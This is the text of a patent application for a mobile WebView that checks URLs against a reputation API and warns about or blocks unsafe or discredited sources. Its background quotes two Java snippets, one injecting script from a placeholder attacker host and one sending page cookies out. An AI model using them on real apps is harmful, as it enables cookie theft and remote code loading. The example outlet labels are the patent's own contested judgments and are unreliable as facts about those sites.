Method, system and application programmable interface within a mobile device for indicating a confidence level of the integrity of sources of information

ABSTRACT

The present disclosure discloses a method of allowing WebView to verify the source context, source reputation, integrity and/or security level of a web content and inform the user with regards to the security and blocks web contents that are determined harmful or inappropriate. In one embodiment of the present disclosure, the WebView checks a trusted data source to see if the visited web content has been labeled or flagged as suspect, safe or unsafe by initiating a connection to a trusted third-party database using a to determine whether or not the URL is associated with a domain that has been classified or labeled as safe or unsafe. The WebView then informs the user about the security level, suspect quality, reputation and/or integrity of the web content through a visual indicator or it can redirect the user to a warning page explaining why access to the site is prohibited, or it can block access without warning.

CONTINUATION-IN-PART TO REGISTERED PATENT

This Nonprovisional Patent Application is a Continuation-in-PartApplication to U.S. Pat. No. 10,264,016 as filed on Mar. 23, 2016 byInventor Paul F. Walsh and titled METHODS, SYSTEMS AND APPLICATIONPROGRAMMABLE INTERFACE FOR VERIFYING THE SECURITY LEVEL OF UNIVERSALRESOURCE IDENTIFIERS EMBEDDED WITHIN A MOBILE APPLICATION. The aforesaidU.S. Pat. No. 10,264,016 as filed on March 23^(rd) aforesaid is herebyincorporated into the present disclosure in its entirety and for allpurposes.

FIELD OF THE INVENTION

The present disclosure relates to methods and systems for verifying thesecurity or reputation level of web content that is embedded within amobile application through a WebView or other means. It also relates tomethods and systems for verifying the security or reputation levelassociated with mobile application owners. The present disclosureprovides systems and methods that inform users regarding the safety of awebsite, universal resource locator (hereinafter, “Url” or “URL”) orlocation that they are accessing or attempting to access and providesvarious related benefits and advantages.

BACKGROUND OF THE INVENTION

The subject matter discussed in the background section should not beassumed to be prior art merely as a result of its mention in thebackground section. Similarly, a problem mentioned in the backgroundsection or associated with the subject matter of the background sectionshould not be assumed to have been previously recognized in the priorart. The subject matter in the background section merely representsdifferent approaches, which in and of themselves may also be inventions.

Most literate individuals today rely on information received viaelectronics networks. This distributed information may impact theindividuals' financial decisions, political beliefs, life choices, etc.While many individuals rely on information provided by self-identifiedsources of news and other information to make both critical and mundanelife decisions, information recipients often fail to realize thatelectronically provided content may have incorrect facts or be providedfrom negligent or deceptive sources having unintentional biases,reporting from idiosyncratic contexts, or intentionally insertingdistortions that are not self-evident. Information recipients maythereby reach conclusions supported on the basis of the fabricatedfacts, incorrect information and/or incomplete data. Furthermore, thereare few available informational assets that may be reliably consultedfor guidance in determining the integrity of information sources. Thereis therefore a long-felt need to provide information that informs thegeneral public of the integrity and character of an information source.

In one modality of information access, information seekers use mobilenetworked communications devices, to include cellular telephones, toaccess information sources of the Internet. Such information sourcesincludes assets available as Universal Resources Identifiers, such asdomain names of the World Wide Web.

WebView is an essential component on mobile operating platforms such asmobile devices using suitable operating systems such as ANDROID™ aslicensed by Google, Inc., of Mountain View, Calif. and iOS™ as licensedby Apple, Inc. of Cupertino, Calif. For purposes of this disclosure, aWebView is a class used to access or display content from the interneton any mobile device using anything other than a commercial web browser(e.g., Firefox™, Safari™, Chrome™ and Internet Explorer™. A WebViewenables web content to be displayed inside mobile apps. For example,application developers can use WebView to display web content inside anapp instead of redirecting users to the native browser. This also allowsdevelopers to offer users an integrated experience because they don'tneed to close the app and open a web browser in order to view the webcontent.

A WebView is not intended to act in the same way as conventional webbrowsers because it does not include many to all of the features of afully developed web browser, such as navigation controls, an address baror safety features. A WebView, by default, allows a mobile applicationto display web content. While users of the WebView may move backward andforward through history and pinch zoom to increase the size of text inthe web page, WebView does not allow users to visit a web page by typinga URL into an address bar and it offers no web search or securitycapabilities that commercial web browsers provide.

WebView was originally designed only to display web content inside anapp and so their security infrastructure didn't support many of thethings that developers are using them for today. There is an increasingtrend towards developers building “hybrid” apps made to look like nativeapps but are in fact, built entirely around a WebView, usingtechnologies such as HTML and CSS—thereby enabling hundreds of thousandsof apps that have browser-like capability, most of which are notdeveloped by well recognized companies and their trustworthiness may bequestionable. Since WebView was first created, app usage is growingexponentially, leading to WebView being used by an increasing number ofusers. For example, WebView can be helpful when application developerswant to provide information in their applications that they might needto update without asking users to update their application, such as anend-user agreement or a user guide. Within their applications,developers can create an Activity that contains a WebView, and then usethat to display their documents that are hosted online. A Browser is acritical component in the Trusted Computing Base (hereinafter, “TCB”) ofthe Web: Web applications rely on the client side of browsers to securetheir cookies, HTTP requests, JavaScript code and so on. Variousalternate preferred embodiments of the method of the present inventionapplies suitable commercially available browsers such as Chrome,Firefox, Safari and Opera because we trust that they can serve as a TCB.When using hybrid applications that act like “browsers”, the trust isgone. Therefore, WebView has weakened the TCB of the Web infrastructure.

However, the design of WebView also changes the landscape of the Web,especially from the security and reputation perspective. As a result,many attacks can be launched either against apps or by them. The Web'ssecurity infrastructure can be weakened when a WebView and itsApplication Programming Interfaces (APIs) are used because WebView doesnot have security related identity indicators. In other words, usersoften cannot identify whether a link has taken them to the expected webpage or web application. Thus, when a user is accessing web contentthrough WebView and the web page asks the user for confidentialinformation such as username, password or credit card number, theconfidential information entered by the user will be vulnerable tospoofing and phishing attacks. Attackers can spoof users usingillegitimate applications with high accuracy, meaning that there is highrisk of phishing attacks on mobile platforms. There are several ways tolaunch attacks on WebView or content in a mobile application. Anexplanation of why and how attacks can take place on WebView or contentin a mobile application, please see:http://www.cis.syr.edu/.about.wedu/Research/paper/webview_acsac2011.pdf,

which is incorporated herein by reference. As an example, the presentdisclosure and referenced article show how using the functionalitiesprovided by WebView, an app can directly inject its own JavaScript codeinto any web page loaded within the WebView. This code can manipulateeverything in the web page, as well as steal or misuse its sensitiveinformation. Using WebView's loadUrl( ) API, Android application caninject arbitrary JavaScript code into the pages loaded by the WebViewcomponent. The loadUrl( ) API receives an argument of string type; ifthe string starts with“javascript:”, WebView will treat the entirestring as JavaScript code, and execute it in the context of the web pagethat is currently displayed by the WebView component. This JavaScriptcode has the same privileges as that included in the web page.Essentially, the injected JavaScript code can manipulate the DOM treeand cookies of the page. WebView has an option named javascriptenable,with False being its default value; namely, by default, WebView does notexecute any JavaScript code. However, this option can be easily set toTrue by the application, and after that, JavaScript code, embedded inthe web page or injected by the application, can be executed. There aremany ways to inject JavaScript code into web page using loadUrl( ). Wegive two examples here to illustrate the details.

The following Java code constructs a string that contains a shortJavaScript program; the program is injected into the web page loaded byWebView. When this program is executed in the context of the web page,it fetches additional (malicious) code from an external web server, andexecutes it.

String js=“javascript: varnewscript.quadrature.=document.createElement(\“script\”);”;js+=“newscript.src=\“http://www.attack.com/malicious.js\”;”;js+=“document.body.appendChild(newscript);”; mWebView.loadUrl(js);

In the above example, the malicious code malicious.js can launch attackson the targeted web application from within the web page. For example,if the web page is the user's Facebook page, the injected JavaScriptcode can delete the user's friends, post on his/her friends' walls,modify the user's profiles, etc. Obviously, if the application isdeveloped by Facebook, none of these will happen, but some popularFacebook apps for Android phones are indeed developed by third parties.

Extracting Information From WebView. In addition to manipulating thecontents/cookies of the web page, the malicious application can also askits injected JavaScript code to send out sensitive information from thepage. The following example shows how an Android application extractsthe cookie information from a targeted web page.

class MyJS {.quadrature.public void SendSecret(String secret) { . . . dowhatever you want with the secret . . .webview.addJavascriptInterface(new MyJS( ), “JsShow”);webview.setWebViewClient(new WebViewClient( ) {public voidonPageFinished(WebView view, String url){view.loadUrl(“javascript:window.JsShow.SendSecret(document.cookie)”);}

In the Java code above, the malicious application defines a class calledMyJS with a function SendSecret, which receives a string as theparameter. The program then registers an instance of MyJS to WebView. Onfinishing loading the page, the application, using loadUrl, invokeswindow.JsShow.SendSecret, passing as the parameter whatever sensitiveinformation the attacker wants to extract out of page. In this case, thecookie information is sent out.

Further, while WebView provided by companies such as Google™ and Apple™offer a secure connection between a mobile application and a web page,their basic user interfaces do not offer users with any indication ofthe level of security offered by the web content. Thus, users will notbe aware of whether the web content is safe or authentic. As a result,this gives the fraudsters (including phishing web sites) an opportunityto exploit such security breech.

Fueled by widespread adoption of employee-owned devices in the workplaceand the explosion of mobile applications, mobile device security is anincreasing threat to personal privacy. Businesses and governmentagencies are at risk with employees using their own devices to accesssome of the most sensitive data in an organization.

Accordingly, there exists a need for an improved method which not onlyallows users of WebView to readily identify whether a web page is safeor is from a reputable source of information, but also allows them toreadily identify the level of security or reputation, thereby increasingusers' confidence in performing secure transactions over WebView. Therealso exists a need for improved security method which protects users andtheir personal data from malicious web sites or phishing attacks whilethey are accessing a web page through WebView. There also exists a needfor improved security method which offers users the ability to blockcontent that they deem inappropriate for themselves or the people forwhom they are responsible while using WebView. There also exists a needfor improved security method which offers users the ability to verifythe real identity of an application owner to help prevent phishing andother malicious attacks by the app itself.

There exists also a broader need for information seekers to consultreliable guidance as to the integrity and character of sources ofinformation, such as provides of text, data, images, video and audiofiles via electronic information sources, such as the World Wide Web.

SUMMARY AND OBJECTS OF THE INVENTION

Toward these objects and other objects that will be made obvious inlight of the present disclosure, a network communications-enabled deviceprovides access to informational content available at a digitizedresource that is accessible and addressable at a Universal ResourceIdentifier, or, “URI”, such as a domain name of a website of the WorldWide Web or other Universal Resource Locator, or “URL”.

In certain alternate embodiments of the method of the present invention,information is received by a mobile communications device, such as acellular smart phone, inside a mobile or tablet application(hereinafter, “an app”) that is capable of informing the user withregards to the integrity, security or reputation level of a web page andblocks web pages that are determined harmful or inappropriate, or from afalse, discredited or suspect universal resource identifier identifiedsource is presented.

In accordance with the method of the present invention (hereinafter,“the invented method”), a mobile device executes a mobile applicationthat is adapted to both receive a universal resource identifier(hereinafter, “URI”) from a network, e.g., the Internet and/or otherelectronic communications network, and to applies the URI within themobile application to access content from the network, wherein themobile application is enabled to access the content from the networkwherein the URI is associated with an indication of informationintegrity, and the mobile application notifies a user of the mobiledevice that the URI is associated with the indication of informationintegrity.

The present disclosure also discloses a WebView or apparatus thatprovides access to a hybrid application that is capable of informing theuser with regards to the identity of the application owner.

A first preferred embodiment of the present invention (hereinafter, “thefirst device” includes a mobile computer system, such as smartphone. Thefirst device comprises a processor; and a computer-readable storagedevice having encoded thereon computer-executable instructions that areexecutable by the processor to perform specific functions. The functionsof the first device that are enabled by the invented method includes oneor more of the elements and aspects of (1.) receiving a message orinstruction indicating a mobile application on the first device whilecoupled to a memory device has accessed or is trying to access contentfrom an electronic communications network that is to be embedded orincorporated into the mobile application, wherein the mobile applicationoptionally or additionally partially or entirely accesses or tries toaccess content from the internet through a WebView of the mobileapplication; (2.) receiving a message or instruction indicating whetheror not the content that is to be embedded or incorporated into themobile application is accessed from a source of suspect information;(3.) sending a message indicating that the source of the content thatthe mobile application has accessed or is trying to access a source ofsuspect information; and/or (4.) alerting a user of the first deviceprior to enabling access to the content from the source of suspectinformation that the source of the content is determined to be a sourceof suspect information.

In various alternate preferred embodiments of the invented method mobiledevice is bi-directionally coupled with an electronic communicationsnetwork (“the network”), and the mobile device, such as but not limitedto a smartphone, comprising a processor coupled to a memory device.Optional aspects and elements of these alternate preferred embodimentsof the invented method include on or more of (1.) the mobile deviceexecuting a mobile application that is adapted to both receive a URIfrom the network and to apply the universal resource identifierexclusively within the mobile application to access a content from thenetwork, wherein the mobile application is enabled to access the contentfrom the network through a WebView of the mobile application; (2.)determining whether or not universal resource identifier is indicated tobe a source of suspect information; (3.) the mobile applicationnotifying a user of the mobile device that the universal resourceidentifier is indicated to be a source of suspect information; and/or(4.) alerting the user of the mobile device if that universal resourceidentifier is determined to be a source of suspect information.

In one alternate optional aspect of the invented method, the WebView ofthe invented device checks a trusted data source to see if the visitedweb content has been labeled or flagged as safe or unsafe. The WebViewinitiates a connection to a trusted third-party database using a RESTfulHTTPS API request to determine whether or not the URL is associated witha domain that has been classified or labeled as safe or unsafe. TheWebView can then inform the user about the security level of the webcontent through a visual indicator or it can redirect the user to awarning page explaining why access to the site is prohibited, or it canblock access without warning.

In another embodiment of the present disclosure, the WebView of thepresent disclosure checks a trusted data source to see if theapplication owner has had their identity verified. The WebView initiatesa connection to a trusted third-party database using a RESTful HTTPS APIrequest to determine whether or not the application owner has had theiridentity verified. Such information may include their legal name,address, nature of business, contact email address and website URL.

In another embodiment of the present disclosure, a computer-implementedmethod, the method implemented using a computer device coupled to amemory device is provided. The method comprises determining when amobile application on a computer device coupled to a memory device hasaccessed or is trying to access content from the internet; determiningwhether or not the content that the mobile application has accessed oris trying to access is safe or unsafe; notifying the user of theapplication or causing the mobile application to notify the user of theapplication that the content that the mobile application has accessed oris trying to access is safe or unsafe; and preventing the user of theapplication from accessing the content from the internet if that contentis determined to be unsafe.

In at least one aspect of at least one embodiment, the mobileapplication accesses or tries to access content from the internetthrough the Web View of the mobile application.

In at least another aspect of at least one embodiment, notifying theuser of the application or causing the mobile application to notify theuser of the application cause a visual indicator to appear in the mobileapplication or in the WebView indicating that the content is safe orunsafe and reputable or from a known discredited source.

In at least another aspect of at least one embodiment, the visualindicator uses different colors to represent whether or not the contentis safe or how safe the content is.

In at least another aspect of at least one embodiment, the method andsystem further comprises storing information regarding whether or notthe content is safe on the user's mobile device and if the content issafe allowing the user to access the content next time it is accessedwithout determining whether or not the content is safe.

In at least another aspect of at least one embodiment, determiningwhether or not the content that the mobile application has accessed oris trying to access is safe or unsafe is determined by whether or notthe URL of the web page associated with the content has been classifiedor labeled as safe or unsafe.

In at least another aspect of at least one embodiment, determiningwhether or not the content that the mobile application has accessed oris trying to access is safe or unsafe and reputable or from a knowndiscredited source is determined by whether a registry has determinedthe content or URL of the web page associated with the content is safeor unsafe and reputable or from a known discredited source.

In yet another embodiment of the present invention, a computer system isprovided. The computer system comprises at least a processor, acomputer-readable storage device having encoded thereoncomputer-executable instructions that are executable by the processor toperform functions comprising: receiving a message or instructionindicating a mobile application on a computer device coupled to a memorydevice has accessed or is trying to access content from the internet;receiving a message or instruction indicating whether or not the contentthat the mobile application has accessed or is trying to access is safeor unsafe; sending a message or instruction indicating that the contentthat the mobile application has accessed or is trying to access is safeor unsafe and sending a message or instruction that prevents the user ofthe application from accessing the content from the internet if thatcontent is determined to be unsafe.

These and other features, aspects and advantages of the presentinvention will become better understood with reference to the followingdrawings, description and claims. This Summary is not intended toidentify key features or essential features of the claimed subjectmatter, nor is it intended to be used to limit the scope of the claimedsubject matter.

BRIEF DESCRIPTION OF THE DRAWINGS

These, and further features of the invention, may be better understoodwith reference to the accompanying specification and drawings depictingthe preferred embodiment, in which:

FIG. 1 is a block diagram showing the process of performing a URL lookupvia a trusted third-party database;

FIG. 2 is a flowchart of an aspect of the invented method wherein amobile device transmits and receives an intelligence message and/or areputation message;

FIG. 3 is a block diagram of an exemplary request message from themobile device to a server;

FIG. 4 is a flowchart of an aspect of the invented method wherein theserver receives a request message from the mobile device and transmits aresponse to the device;

FIG. 5 is a block diagram of an exemplary response message from theserver to the mobile device having either intelligence or reputationinformation;

FIG. 6 is a network diagram showing an electronic communications networkcomprising a remote server and the mobile device;

FIG. 7 is a block diagram of the mobile device;

FIG. 8 is a block diagram of the server;

FIG. 9 is a flow chart of an aspect of the invented method wherein auser may opt not to receive intelligence or reputation information fromthe server;

FIG. 10 is a block diagram of an exemplary URI record;

FIG. 11 is a block diagram of a category library contained within thememory of the server;

FIG. 12A is a block diagram of an advertising content library containedwithin the memory of the server;

FIG. 12B is a block diagram of an exemplary advertising content record;

FIG. 13A is a block diagram of a card library contained within thememory of the server;

FIG. 13B is a block diagram of an exemplary card record;

FIG. 14 is a flowchart of an aspect of the invented method wherein theserver transmits advertising content and/or cards to the mobile devicein a response message; and

FIG. 15 is a flowchart of an aspect of the invented method wherein themobile device accepts and renders a response message from the server.

DETAILED DESCRIPTION OF THE INVENTION

The following description is not to be taken in a limiting sense, but ismade merely for the purpose of illustrating the general principles ofthe invention. Various inventive features are described below that caneach be used independently of one another or in combination with otherfeatures.

Throughout the disclosure, various embodiments will be referred to as apresent disclosure and the use of such term is not meant to be limitingbut rather encompassing of all of the various embodiments, features andaspects thereof, as well as other anticipated embodiments.

The word “exemplary” is used herein to mean “serving as an example,instance, or illustration.” Any aspect described herein as “exemplary”is not necessarily to be construed as exclusive, preferred oradvantageous over other aspects.

In this description, when the term “safe” or “secure”, includes, but isnot limited to, protecting the user from phishing, spoofing, malware,spyware and/or inappropriate content.

Broadly, embodiments of method of the present invention (hereinafter“invented method”) generally provide methods of verifying the securitylevel, the intelligence, and/or the reputation of web content that isbeing accessed through WebView. In one embodiment, the method compriseshaving a WebView that determines a universal resource indicator (“URI”),wherein the URI may optionally be, but is not limited to, a universalresource locator (“URL”), of a web page; initiating a secure connectionto the domain associated with the URL; and informing the user withregards to the security level of the web content. The user can beinformed through a visual indicator that is displayed on a screen of amobile device 10. In at least one embodiment, the same method is used todetermine if the identity of an owner of an application has beenverified. In at least one embodiment, the same method is used todetermine if the URI has been categorized as Fake-news, Far-right,Far-left, Satire or Alternative-right as is therefore not considered areliable course of information. The user can also be informed through avisual indicator that is displayed on the screen of the mobile device10, through an on-screen message or by means of other notificationmethods known in the art.

In one embodiment of the present disclosure, the method of providing asecure WebView comprises using a WebView or a mobile applicationembedding a WebView to determine if the URL of a web page has beenlabeled. If the URL is labeled under a category that is consideredharmful or inappropriate, access to the web content is blocked and, inone aspect of at least one embodiment, the user is prevented fromaccessing the invention or redirected to a web page that explains whyaccess has been denied. In another aspect of the at least oneembodiment, access to the web content is permitted if the URL is notlabeled under a category that is considered unsafe or insecure. Harmfulor inappropriate content may include malware, spyware, phishing,Fake-news, Far-right, Far-left, Satire or Alternative-right and/orpornography etc. The identification of owner of the applicationembedding WebView or Web Content can optionally be identified to allowthe user to know more about the safety level of the application.

In yet another embodiment of the present disclosure, parameters that areincluded in an API call include, but not limited to the apikeyparameter, which identifies the requesting application and/or theversion of the app (e.g. “2.1.2”). Each URL to be inspected should beencoded as per RFC 3986 (i.e. ‘percent encoded’). It is understood thatfor apikey parameter, each apikey should be unique to each clientapplication on each platform (e.g., iOS versions will have a differentapikey than the Android equivalent). When registering the clientapplication via the trusted domain, details of the client applicationdeveloper should also be provided.

In yet another embodiment of the present disclosure, the WebView (or anapparatus that provides access to web content inside a mobile device 10application) of the present disclosure is checking a trusted data sourceto see if the visited web content has been labeled or flagged as safe orunsafe. This can be done by, for example, initiating a connection to atrusted third-party database using a RESTful HTTPS API request todetermine whether or not the URL is associated with a domain that hasbeen classified or labeled as safe or unsafe. The WebView of the presentdisclosure can then either show a visual indicator based on whether ornot web content is safe, or it can redirect the user to a warning pageexplaining why access to the site is prohibited, or it can block accesswithout warning. For example, the WebView can redirect the user to a newweb page or informational web page using a HTTP or HTTPS redirect. AWebView could also provide a visual warning indicator inside theWebView, such as a question mark (?) or stop sign and uses varied colorsto represent different levels of security or annotations for indicatingnews or information sources that are labeled as not being unbiased andof known refuted origin.

As an illustration, a typical API call an application using a WebViewwould make to check a URL's label status is a HTTPS request similar tothe following:

GET /label/get_urls HTTP/1.1

Host api.safedomain.com.

This API call takes fully-qualified URLs and determines whether the fullURL, folder/path, domain or sub-domain of each given URL has a labeltype associated with it.

In yet another embodiment of the present disclosure, the WebView (or anapparatus that provides access to web content inside a mobile or tabletapp) of the present disclosure is checking a trusted data source to seeif the application owner has had their identity verified. This can bedone by initiating a connection to a trusted third-party database usinga RESTful HTTPS API request to determine whether or not the apikey hasbeen associated with a verified entity.

The WebView of the present disclosure can then either show a visualindicator based on whether or not the application owner's identity hasbeen verified, or it can redirect the user to a warning page explainingwhy the identity certificate has been revoked. For example, the WebViewcan redirect the user to a web page or informational web page using aHTTP or HTTPS redirect. An application could also provide a visualwarning indicator inside the WebView, such as a green padlock or tick. Auser would select the visual indicator to view a web page where thefollowing information is provided: Entity name, address, contact person,and contact email address

As an illustration, a typical API call an application using a WebViewwould make to check an app owner's identity status is a HTTPS requestsimilar to the following:

GET /label/get_urls HTTP/1.1

Host api.apikeyiosxxx.xx.

This API call takes fully-qualified API keys and determines whether theapplication has an identity label type associated with it.

In addition, when the API is called, one of the following response codescould be returned: 400—Bad request—Missing/Invalid URL parameters;401—Unauthorized—Invalid authentication parameters have been provided;either the provided api_key was not found, or it may have been rejecteddue to a violation of service terms; 405—Method not allowed—Check thatyou are using the proper method for the resource (i.e. GET or POST);and/or 200—Ok—If the given parameters were correct, whether or notlabels have been found, the API will respond Ok.

Below is an example of one version of code that can practice the methodof the present disclosure.

POST : https://dev.metacert.com/v4/check/ HEADER : apikey :  < your apikey > : Content-Type:application/json BODY : {   “url”:“http://example.org/malicious/attack.html”   }

An exemplary response to the above request is as follows:

{    “status”: {      “code”: 200,      “message”: “OK”    },    “data”:{      “URLs”: [ ],      “Folders”: [ ],      “Domains”: [        {         “domain”: “example.org”,          “type”: “malware-phishing”   }   ]  } }

The response for “folder” returned a type “xxx”. This means that thefolder is classified as ‘Pornography’ so you should assume that thisparticular URL and every other URL in this folder contains pornography.The response also tells you that, even though, the folder and,therefore, the URL, contains XXX content, the domain is labeled as‘Image Sharing’. If a URL hasn't been found under a chosen category, anempty array will be returned.

Additional, older versions of implementations of the invented method arealso presented below.

Below is an example of one version of the code that can practice themethod of the present disclosure for the purpose of reputationidentifications.

  fake-news   http://infowars.com  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[ ],“Folders”:[],“Domains”:[{“domain”:“ infowars.com”,“type”:“fake-news”}]}}  facebook.com/InfoWars-80256732576/  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[],“Folders”:[{“folder”:“/infowars-80256732576/”,“type”:“fake-news”}],“Domains”:[{“domain”:“facebook.com”,“type”:“social-networks”}]}}   alt-right   http://breitbart.com  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[ ],“Folders”:[],“Domains”:[{“domain”:“ breitbart.com”,“type”:“alt-right”}]}}  facebook.com/breitbart  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[],“Folders”:[{“folder”:“/breitbart/”,“type”:“alt-right”}],“Domains”:[{“domain”:“facebook.com”,“type”:“social-networks”}]}}  far-left   truthexaminer.com  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[ ],“Folders”:[],“Domains”:[{“domain”:“ truthexaminer.com”,“type”:“far-left”}]}}  facebook.com/truthexaminer  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[],“Folders”:[{“folder”:“/truthexaminer/”,“type”:“far-left”}],“Domains”:[{“domain”:“facebook.com”,“type”:“social-networks”}]}}   far-right   redstate.com  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[ ],“Folders”:[],“Domains”:[{“domain”:“ redstate.com”,“type”:“far-right”}]}}  facebook.com/redstateblog  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[],“Folders”:[{“folder”:“/redstateblog/”,“type”:“far-right”}],“Domains”:[{“domain”:“facebook.com”,“type”:“social-networks”}]}}   satire   theonion.com  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[ ],“Folders”:[],“Domains”:[{“domain ”:“theonion.com”,“type”:“satire”}]}}  facebook.com/TheOnion/  {“status”:{“code”:200,“message”:“OK”},“data”:{“URLs”:[],“Folders”:[{“folder”:“/theonion/”,“type”:“satire”}],“Domains”:[{“domain”:“facebook.com”,“type”:“social-networks”}]}}

RESTfulAPI Call:

GET /1.1/label/get_info?api_key=9ccd4e2a&uri=socialnetwork.com HTTP/1.1Host api.trustedsource.com

For a request, the server should include the type of URL in the responsebody when the queried URL matches one of the categories that is deemedunsafe. Example of a response can be:

  TABLE-US-00001 XML (typically a W3C POWDER document) <powderxmlns=“http://www.w3.org/2007/05/powder#”> <attribution> <issuedbysrc=“http://www.trustedsource.com/company.rdf#trustedsource”/><issued>2011-05- 27T00:00:00</issued> </attribution> <dr> <iriset><includehosts>samplesofmalware.com</includehosts> </iriset><descriptorset> <typeofsrc=“http://www.trustedsource.com/rdf/malware#malware”/><displaytext>samplesofmalware.com is malware</displaytext></descriptorset> </dr> </powder> JSON { “response”: { “-stat”:“success”, “labels”: { “certificate”: [ { “-type”: “social network”,“includehosts”: [“socialnetwork.com”] } } } }

In yet another embodiment of the present disclosure, the developers canalso pick multiple categories of content they wish to block inside theirapp, so it's necessary to provide instructions on how the WebView shouldbehave for each label type. Labels are used to define a category.

WebView properties are also configurable via a cloud interface. Thus,any and all updates to these properties are retrieved from the cloud viaan API call and applied upon retrieval to the WebView. A developer canreconfigure on-the-fly which categories of Internet content are allowedor blocked.

In yet another embodiment of the present disclosure, REST based API Callcan be represented by the following”

  TABLE-US-00002 XML <response stat=“success”> <trustedsource><date>2011/06/21 04:58:27</date> <updated>2011/05/01 12:30:23</updated><products> <product name=“malware”><smallIcon>https://trustedsource.com/images/xxx_small_icon.png</-smallIcon> <certTitle>Malware</certTitle> <certContent>This web contenthas been issued with a malware label. Access to this web content hasbeen prohibited. For more information visitsecurewebview.trustedsource.com</certContent> <urlBar>NULL</urlBar><action=“block”> <message>This link has been blocked because it maycontain harmful or inappropriate content</message> </action> </product></products> </trustedsource> </response> JSON { “status”: “success”,“trustedsource : { date : “2011/06/21 04:58:27”, “updated: 2011/05/0112:30:23, “products”: [ { “name”: “malware”, “smallIcon”:“https://trustedsource.com/images/xxx_small_icon.png”, “certTitle”:“Malware”, “certContent”:This web page has been issued with a malware label. Access to this webpage has been prohibited. For more information visitsecurewebview.trustedsource.com”, “urlBar”:null,“action”:{“type”:“block”, “message”:“This link has been blocked becauseit may contain harmful or inappropriate content”

Additional categories which may optionally or additionally be blocked bymeans of the invented method are as follows:

{  ″labels″: [  “malware”,  ″phishing″,  ″image-sharing″,  ″gambling″, ″religion″,  “kid-safe”,  ″alcohol″,  ″chat″,  ″dating″,  ″lingerie″, ″sex″,  ″sex-health″,  ″tobacco″,  ″torrent″,  ″web-proxies″, ″app-stores″,  ″ads″,  ″arts-entertainment″,  ″automotive″, ″business″,  ″careers″,  ″education″,  ″family-parenting″, ″health-fitness″,  ″food-drink″,  ″hobbies-interests″,  ″home-garden″, ″law-gov-politics″,  ″personal-finance″,  ″society″,  ″science”, “pornography″  ″pets″,  ″technology-computing″,  ″travel″, ″real-estate″,  ″shopping″,  ″advertising″,  ″aggressive″,  ″anime″, ″bullying″,  “center”,  “conservative”,  ″cult″,  ″drugs″,  ″email″, ″fashion″,  ″forum″,  ″hacking″,  “ideological”,  ″image-sharing″, ″image-hosting″,  “liberal”,  ″mature″,  ″movies″,  ″models″,  ″news″, “parody”,  ″photo-sharing″,  “politics″,  “racially supremacist”,“fake-news”, “alt-right”, “alt-left”, “far-left”, “dirtbag left”,“satire”, “far-right”,  ″religion″,  ″search″,  ″self-harm″, ″social-networks″,  ″sports″,  ″suicide″,  ″spyware″,  ″video-sharing″, ″violence″,  “white supremacist”  ″weapons″,  ″indecent″, “child-abuse″,  ″warez″  ] }

FIG. 1 is a block diagram showing the process of performing a URL lookupvia a trusted third-party database. When a user is accessing web contentthrough a link in WebView, the WebView first checks the URL of the linkagainst a local cache of previously-retrieved API results. This can helpto optimize overall performance but it is not an essential step of theprocess. If a cache entry exists, the label status of the URL is knownand the WebView can decide to block the URL or allow access based on thelabel status. If cache entry does not exist, the URL is percent-encodedand attached to an API call to a trusted third-party. If the API callreturns an error, the client application must deal with that errorgracefully. If it returns successfully, the content of the API responseis inspected for a label matching the given URL. If no label is found,the third-party does not know of this URL and so, the client applicationmust make a presumption about the URL's label status; in most cases, theapplication may just presume that the URL is safe and allow the user toaccess the web content. However, if a label is found, the category ofthat label is checked against the application's list of unsafecategories and if a match is found, the URL is considered unsafe and theapplication takes predetermined actions such as blocks the URL fromloading or warns the user.

API calls for some URLs may return more than one label result. In thesecases, the specificity of the listed label's URL may be considered. Forinstance, in one embodiment of the present disclosure, a sub-domainlabel will override a domain's label or a full-URL match will override apartial folder match.

In some cases, the client application could perform transformations onthe URLs it passes to the API so as to maximize the chance of a match toa data-point in the trusted third-party's database. This can be done bydetecting proxy sites and parsing the proxied URL from the given URL.Alternatively, for media such as pictures and videos, extraneous queryparameters unrelated to the actual identification of that media shouldbe removed before an API call is made for that URL.

In yet another embodiment of the present disclosure, the same securityverification process that is applied on the WebView or an applicationembedding WebView of the present disclosure can also be applied onapplications that are entirely built using non-native applicationtechnologies such as HTML and CSS.

Applications using non-native application technologies can sometimes bemade to look like native applications. However, non-native applicationsmay not share the same security features as the native applications.Non-native technologies may be used by a developer to develop anapplication to look like an application coming from a trusted brand.Such problems are being seen on Android applications because they do notgo through an app review process before being released to the public.Therefore, this gives fraudsters a chance to create an application thatlooks like a legit and branded application but is actually used forstealing sensitive information from the user or for other illegalpurposes.

When a developer updates an application native to platforms such as iOSor Android, users are given a choice to download the updates. Withhybrid applications using non-native technologies with the help of aWebView, the application developer can completely change the look andfeel of the application or the nature of an application withoutinforming users—users may not even know when hybrid applications havebeen updated. The user may not know the difference between a nativeapplication and a hybrid application as they can be made to look thesame.

The security verification process of the present invention allows theapplication developers/owners to display an indicator on their app todemonstrate that their identity has been verified—using the same lookupservice and methods as described previously. For example, and not by wayof limitation, instead of just verifying the safety level of a web page,the identity of the application owner is further or independentlyverified. The identity of the application owner is first checked againsta trusted database, and then a visual indicator can be used to displaywhether the application belongs to the owner as the application claimedand/or whether an owner is a trusted owner (i.e., certified owner suchas Microsoft™ or Apple™).

Among other things, the present disclosure provides various benefits andadvantages to the user accessing web content via WebView. The presentdisclosure allows the user to know the security level of the web contenthe or she is viewing and blocks access or warns the user when the webcontent is determined harmful or inappropriate. It should be understood,of course, that the foregoing relates to exemplary embodiments of theinvention and that modifications may be made without departing from thespirit and scope of the invention as set forth in the following claims.

